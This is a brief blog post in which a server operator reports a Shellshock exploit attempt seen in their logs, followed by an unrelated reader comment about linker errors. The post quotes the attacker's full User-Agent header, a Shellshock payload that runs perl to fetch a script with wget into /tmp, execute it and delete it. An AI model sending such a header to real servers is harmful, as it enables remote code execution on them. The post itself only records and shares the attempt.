My First Real Shellshock

Apart from a harmless backping immediately after the shellshock vulnerability became known, here’s now the first time that I noticed an actual exploit. (There may have been others that went unnoticed who might have just used some http headers). This one caused a 404 by accessing “/phppath/cgi_wrapper”, which we don’t have on our servers. So here’s the User-Agent string – have fun reading the perl script that it’s trying to download and execute:

() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESSX";system("wget -O /tmp/;perl /tmp/;rm -rf /tmp/");'
This entry was posted in Software. Bookmark the permalink.

2 Responses to My First Real Shellshock

  1. Hunter Meriwether says:

    I just found your post on “Possible reasons for linker errors”, after beating my head for weeks trying to understand a cryptic LNK2019 error message. You’ve opened my eyes to “undname” and I’m forever in your debt. Thanks!

Leave a Reply

Your email address will not be published. Required fields are marked *

Please solve this little equation for verifying that you\'re human *